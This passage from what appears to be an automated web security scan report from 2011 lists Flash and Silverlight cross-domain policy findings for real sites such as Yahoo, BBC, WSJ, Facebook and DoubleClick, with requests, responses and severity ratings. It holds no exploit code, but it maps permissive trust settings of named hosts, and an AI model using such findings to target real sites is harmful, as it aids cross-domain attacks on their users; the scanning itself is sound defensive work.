<allow-access-from domain="*.google.sk" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

4.65. http://my.yahoo.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://my.yahoo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: my.yahoo.com

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 14:11:11 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Mon, 21 Aug 2006 16:30:13 GMT
Accept-Ranges: bytes
Content-Length: 228
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.yahoo.com" secure="false" />
...[SNIP]...

4.66. http://newsrss.bbc.co.uk/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://newsrss.bbc.co.uk
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: newsrss.bbc.co.uk

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 20 Apr 2011 09:07:59 GMT
Content-Type: text/xml
Cache-Control: max-age=104
Expires: Mon, 13 Jun 2011 14:47:37 GMT
Date: Mon, 13 Jun 2011 14:45:53 GMT
Content-Length: 1081
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-o
...[SNIP]...
<allow-access-from domain="downloads.bbc.co.uk" />
   <allow-access-from domain="www.bbcamerica.com" />
   <allow-access-from domain="*.bbcamerica.com" />
   <allow-access-from domain="www.bbc.co.uk" />
   <allow-access-from domain="news.bbc.co.uk" />
   <allow-access-from domain="newsimg.bbc.co.uk"/>
   <allow-access-from domain="nolpreview11.newsonline.tc.nca.bbc.co.uk" />
...[SNIP]...
<allow-access-from domain="newsapi.bbc.co.uk" />
   <allow-access-from domain="extdev.bbc.co.uk" />
   <allow-access-from domain="stats.bbc.co.uk" />
   <allow-access-from domain="*.bbc.co.uk"/>
   <allow-access-from domain="*.bbci.co.uk"/>
   <allow-access-from domain="*.bbc.com"/>
...[SNIP]...
<allow-access-from domain="jam.bbc.co.uk" />
   <allow-access-from domain="dc01.dc.bbc.co.uk" />
...[SNIP]...

4.67. http://online.wsj.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://online.wsj.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: online.wsj.com

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 00:13:55 GMT
Server: Apache
Last-Modified: Tue, 17 May 2011 13:55:25 GMT
Accept-Ranges: bytes
Content-Length: 3647
P3P: CP=CAO DSP COR CURa ADMa DEVi TAIo PSAa PSDa IVDi CONi OTPi OUR OTRi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA OTC
Keep-Alive: timeout=2, max=34
Connection: Keep-Alive
Content-Type: text/xml

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
    <allow-access-from domain="*.doubleclick.net"/>
<allow-access-from domain="*.doubleclick.com"/>
    <allow-access-from domain="m.doubleclick.net"/>
    <allow-access-from domain="*.dowjonesonline.com"/>
    <allow-access-from domain="www.dowjonesonline.com"/>
    <allow-access-from domain="a.marketwatch.com"/>
    <allow-access-from domain="*.marketwatch.com"/>
    <allow-access-from domain="www.akamai.com"/>
    <allow-access-from domain="*.akamai.com"/>
    <allow-access-from domain="www.wsj.com"/>
    <allow-access-from domain="*.wsj.com"/>
    <allow-access-from domain="s.dev.wsj.com"/>
    <allow-access-from domain="idev.online.wsj.com"/>
    <allow-access-from domain="s.wsjsat.dowjones.net"/>
    <allow-access-from domain="s.s.dev.wsj.com"/>
<allow-access-from domain="reno.wsjqa.dowjones.net"/>
    <allow-access-from domain="*.online.wsj.com"/>
...[SNIP]...
<allow-access-from domain="quotes.wsj.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="public.wsj.com"/>
    <allow-access-from domain="*.public.wsj.com"/>
<allow-access-from domain="www.barrons.com"/>
    <allow-access-from domain="*.barrons.com"/>
...[SNIP]...
<allow-access-from domain="idev.online.barrons.com"/>
    <allow-access-from domain="*.online.barrons.com"/>
    <allow-access-from domain="online.barrons.com"/>
    <allow-access-from domain="public.barrons.com"/>
    <allow-access-from domain="*.public.barrons.com"/>
    <allow-access-from domain="*.aol.com"/>
    <allow-access-from domain="*.brightcove.com"/>
    <allow-access-from domain="creatives.doubleclick.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="m.2mdn.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="m2.2mdn.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.2mdn.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="wsjdigital.com"/>
...[SNIP]...
<allow-access-from domain="*.cooliris.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.piclens.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.dowjones.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="online.s.dev.wsj.com"/>
    <allow-access-from domain="quotes.s.dev.wsj.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="polls.s.dev.wsj.com"/>
<allow-access-from domain="blogs.s.dev.wsj.com"/>
<allow-access-from domain="triplewebdesign.com"/>
<allow-access-from domain="ingyournumber.com"/>
   <allow-access-from domain="*.ingyournumber.com"/>
<allow-access-from domain="*.issuu.com"/>
   <allow-access-from domain="static.issuu.com"/>
    <allow-access-from domain="professional.s.dev.wsj.com"/>
    <allow-access-from domain="*.dartmotif.com"/>
    <allow-access-from domain="wsjradio.com"/>
    <allow-access-from domain="*.wsjradio.com"/>
    <allow-access-from domain="www.wsjradio.com"/>
    <allow-access-from domain="*.eyereturn.com"/>
<allow-access-from domain="fxtrader.l.dev.dowjones.com"/>
    <allow-access-from domain="fxtrader.f.dev.dowjones.com"/>
    <allow-access-from domain="fxtrader.s.dev.dowjones.com"/>
    <allow-access-from domain="fxtrader.dowjones.com"/>
    <allow-access-from domain="dowjones.visualla.com"/>
<allow-access-from domain="*.smartmoney.com"/>
<allow-access-from domain="*wsj-asia.com"/>
<allow-access-from domain="*.wsj-asia.com"/>
...[SNIP]...

4.68. http://p.opt.fimserve.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://p.opt.fimserve.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: p.opt.fimserve.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"695-1261547040000"
Last-Modified: Wed, 23 Dec 2009 05:44:00 GMT
Content-Type: application/xml
Content-Length: 695
Date: Tue, 14 Jun 2011 00:13:57 GMT
Connection: keep-alive

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="www.ksolo.com" secure="true" />
...[SNIP]...
<allow-access-from domain="staging.ksolo.com" secure="true" />
...[SNIP]...
<allow-access-from domain="staging.myspace.ksolo.com" secure="true" />
...[SNIP]...
<allow-access-from domain="ksolo.com" secure="true" />
...[SNIP]...
<allow-access-from domain="ksolo.myspace.com" secure="true" />
...[SNIP]...
<allow-access-from domain="myspace.ksolo.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.myspace.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.myspacecdn.com" secure="true" />
...[SNIP]...

4.69. http://static.ak.fbcdn.net/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: static.ak.fbcdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
X-FB-Server: 10.138.64.182
Date: Tue, 14 Jun 2011 00:14:25 GMT
Content-Length: 1527
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="s-static.facebook.com" />
   <allow-access-from domain="static.facebook.com" />
   <allow-access-from domain="static.api.ak.facebook.com" />
   <allow-access-from domain="*.static.ak.facebook.com" />
   <allow-access-from domain="s-static.thefacebook.com" />
   <allow-access-from domain="static.thefacebook.com" />
   <allow-access-from domain="static.api.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.fbcdn.com" />
   <allow-access-from domain="s-static.ak.fbcdn.net" />
   <allow-access-from domain="*.static.ak.fbcdn.net" />
   <allow-access-from domain="s-static.ak.facebook.com" />
   <allow-access-from domain="www.facebook.com" />
   <allow-access-from domain="www.new.facebook.com" />
   <allow-access-from domain="register.facebook.com" />
   <allow-access-from domain="login.facebook.com" />
   <allow-access-from domain="ssl.facebook.com" />
   <allow-access-from domain="secure.facebook.com" />
   <allow-access-from domain="ssl.new.facebook.com" />
...[SNIP]...
<allow-access-from domain="fvr.facebook.com" />
   <allow-access-from domain="www.latest.facebook.com" />
   <allow-access-from domain="www.inyour.facebook.com" />
   <allow-access-from domain="www.beta.facebook.com" />
...[SNIP]...

4.70. http://us.adserver.yahoo.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://us.adserver.yahoo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: us.adserver.yahoo.com

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 00:23:35 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Thu, 07 Apr 2011 23:30:00 GMT
Accept-Ranges: bytes
Content-Length: 1934
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*.sueddeutsche.de" />
<allow-access-from domain="*.ooyala.com" />
<allow-access-from domain="*.cbs.com" />
<allow-access-from domain="*.fwmrm.net" />
<allow-access-from domain="*.auditude.com" />
<allow-access-from domain="*.brightcove.com" />
<allow-access-from domain="*.broadcast.com" />
<allow-access-from domain="*.comcastonline.com" />
<allow-access-from domain="*.flickr.com" />
<allow-access-from domain="*.grindtv.com" />
<allow-access-from domain="*.hotjobs.com" />
<allow-access-from domain="*.launch.com" />
<allow-access-from domain="*.maven.net" />
<allow-access-from domain="*.mavenapps.net" />
<allow-access-from domain="*.maventechnologies.com" />
<allow-access-from domain="*.mlb.com" />
<allow-access-from domain="*.overture.com" />
<allow-access-from domain="*.rivals.com" />
<allow-access-from domain="*.scrippsnewspapers.com" />
<allow-access-from domain="*.vmixcore.com" />
<allow-access-from domain="*.vmix.com" />
<allow-access-from domain="*.vipix.com" />
<allow-access-from domain="*.yahoo.com" />
<allow-access-from domain="*.yahooligans.com" />
<allow-access-from domain="*.yimg.com" />
<allow-access-from domain="www.comcast.net" />
<allow-access-from domain="dpbaseball.comcast.net" />
<allow-access-from domain="fantasysports.comcast.net" />
<allow-access-from domain="finance.comcast.net" />
<allow-access-from domain="horoscope.comcast.net" />
<allow-access-from domain="sz0005.wc.mail.comcast.net" />
<allow-access-from domain="games.comcast.net" />
<allow-access-from domain="community.comcast.net" />
<allow-access-from domain="player.sambatech.com.br" />
<allow-access-from domain="*.zope.net" />
<allow-access-from domain="*muzu.tv" />
<allow-access-from domain="*movieclips.com" />
<allow-access-from domain="*.adap.tv" />
...[SNIP]...

4.71. http://www.facebook.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.facebook.com

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
X-FB-Server: 10.54.142.64
Connection: close
Content-Length: 1527

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="s-static.facebook.com" />
   <allow-access-from domain="static.facebook.com" />
   <allow-access-from domain="static.api.ak.facebook.com" />
   <allow-access-from domain="*.static.ak.facebook.com" />
   <allow-access-from domain="s-static.thefacebook.com" />
   <allow-access-from domain="static.thefacebook.com" />
   <allow-access-from domain="static.api.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.fbcdn.com" />
   <allow-access-from domain="s-static.ak.fbcdn.net" />
   <allow-access-from domain="*.static.ak.fbcdn.net" />
   <allow-access-from domain="s-static.ak.facebook.com" />
...[SNIP]...
<allow-access-from domain="www.new.facebook.com" />
   <allow-access-from domain="register.facebook.com" />
   <allow-access-from domain="login.facebook.com" />
   <allow-access-from domain="ssl.facebook.com" />
   <allow-access-from domain="secure.facebook.com" />
   <allow-access-from domain="ssl.new.facebook.com" />
   <allow-access-from domain="static.ak.fbcdn.net" />
   <allow-access-from domain="fvr.facebook.com" />
   <allow-access-from domain="www.latest.facebook.com" />
   <allow-access-from domain="www.inyour.facebook.com" />
   <allow-access-from domain="www.beta.facebook.com" />
...[SNIP]...

4.72. http://api.twitter.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.twitter.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: api.twitter.com

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 13:39:39 GMT
Server: hi
Status: 200 OK
Last-Modified: Mon, 06 Jun 2011 20:41:57 GMT
Content-Type: application/xml
Content-Length: 561
Cache-Control: max-age=1800
Expires: Mon, 13 Jun 2011 14:09:39 GMT
Vary: Accept-Encoding
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
<allow-access-from domain="twitter.com" />
...[SNIP]...
<allow-access-from domain="search.twitter.com" />
   <allow-access-from domain="static.twitter.com" />
...[SNIP]...

4.73. https://edit.yahoo.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://edit.yahoo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: edit.yahoo.com

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 00:24:26 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Mon, 01 Nov 2010 22:44:30 GMT
Accept-Ranges: bytes
Content-Length: 235
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="open.login.yahoo.com" secure="true"/>
...[SNIP]...

4.74. http://s0.videopress.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://s0.videopress.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: s0.videopress.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Content-Type: text/x-cross-domain-policy
Date: Tue, 14 Jun 2011 00:32:02 GMT
Last-Modified: Thu, 26 May 2011 00:08:19 GMT
Server: ECS (dca/532A)
X-Cache: HIT
Content-Length: 884
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy><site-control permitted-cross-domain-policies="master-only" /><allow-access-from domain="v.wordpress.com" to-ports="80,443" />
...[SNIP]...
<allow-access-from domain="v0.wordpress.com" to-ports="80,443" secure="false" />
...[SNIP]...
<allow-access-from domain="stats.wordpress.com" to-ports="80,443" /><allow-access-from domain="videopress.com" to-ports="80,443" secure="false" />
...[SNIP]...

4.75. http://stats.wordpress.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://stats.wordpress.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: stats.wordpress.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 13 Jun 2011 17:45:16 GMT
Content-Type: text/xml
Connection: close
Content-Length: 585
Last-Modified: Wed, 23 Jun 2010 20:40:25 GMT
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy><site-control permitted-cross-domain-policies="master-only" /><allow-access-from domain="v.wordpress.com" to-ports="80,443" /><allow-access-from domain="v0.wordpress.com" to-ports="80,443" secure="false" /><allow-access-from domain="videopress.com" to-ports="80,443" secure="false" /><allow-access-from domain="s0.videopress.com" to-ports="80,443" secure="false" /><allow-access-from domain="realeyes.com" to-ports="80,443" />
...[SNIP]...

4.76. http://videopress.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://videopress.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: videopress.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 14 Jun 2011 00:31:44 GMT
Content-Type: text/x-cross-domain-policy
Connection: close
Content-Length: 884
Last-Modified: Thu, 26 May 2011 00:08:10 GMT
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy><site-control permitted-cross-domain-policies="master-only" /><allow-access-from domain="v.wordpress.com" to-ports="80,443" />
...[SNIP]...
<allow-access-from domain="v0.wordpress.com" to-ports="80,443" secure="false" />
...[SNIP]...
<allow-access-from domain="stats.wordpress.com" to-ports="80,443" />
...[SNIP]...
<allow-access-from domain="s0.videopress.com" to-ports="80,443" secure="false" />
...[SNIP]...

4.77. http://yadvertisingblog.app3.hubspot.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://yadvertisingblog.app3.hubspot.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: yadvertisingblog.app3.hubspot.com

Response

HTTP/1.1 200 OK
Content-Length: 206
Content-Type: text/xml
Last-Modified: Wed, 17 Oct 2007 21:47:20 GMT
Accept-Ranges: bytes
ETag: "0e4f34a711c81:ccd2"
Server: Microsoft-IIS/6.0
P3P: policyref="http://www.hubspot.com/w3c/p3p.xml", CP="CURa ADMa DEVa TAIa PSAa PSDa OUR IND DSP NON COR"
X-Powered-By: ASP.NET
Date: Tue, 14 Jun 2011 00:21:35 GMT
Connection: close

<?xml version="1.0" ?>
<!DOCTYPE cross-domain-policy (View Source for full doctype...)>
- <cross-domain-policy>
<allow-access-from domain="www.bluemedia.com" secure="true" />
</cross-domain-p
...[SNIP]...

5. Silverlight cross-domain policy  previous  next
There are 15 instances of this issue:

Issue background

The Silverlight cross-domain policy controls whether Silverlight client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Silverlight cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.


5.1. http://ad.doubleclick.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 314
Last-Modified: Tue, 20 May 2008 22:28:37 GMT
Date: Mon, 13 Jun 2011 14:11:24 GMT

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

5.2. http://ads.pointroll.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ads.pointroll.com

Response

HTTP/1.1 200 OK
Content-Length: 348
Content-Type: text/xml
Last-Modified: Wed, 01 Dec 2010 17:45:39 GMT
Accept-Ranges: bytes
ETag: "80a33917f91cb1:1334"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Date: Tue, 14 Jun 2011 00:19:16 GMT
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="http://*" />
</allow-from>

...[SNIP]...

5.3. http://b.scorecardresearch.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 15 Oct 2009 22:41:14 GMT
Content-Type: application/xml
Expires: Tue, 14 Jun 2011 17:45:46 GMT
Date: Mon, 13 Jun 2011 17:45:46 GMT
Content-Length: 320
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*" />
</allow-from>
<grant-to>
<resou
...[SNIP]...

5.4. http://b.voicefive.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.voicefive.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: b.voicefive.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 15 Oct 2009 22:41:14 GMT
Content-Type: application/xml
Expires: Wed, 15 Jun 2011 00:16:56 GMT
Date: Tue, 14 Jun 2011 00:16:56 GMT
Content-Length: 320
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*" />
</allow-from>
<grant-to>
<resou
...[SNIP]...

5.5. http://mswindowswolglobal.112.2o7.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mswindowswolglobal.112.2o7.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: mswindowswolglobal.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 00:34:26 GMT
Server: Omniture DC/2.0.0
xserver: www375
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

5.6. http://om.dowjoneson.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://om.dowjoneson.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: om.dowjoneson.com

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 00:13:57 GMT
Server: Omniture DC/2.0.0
xserver: www357
Content-Length: 263
Keep-Alive: timeout=15
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
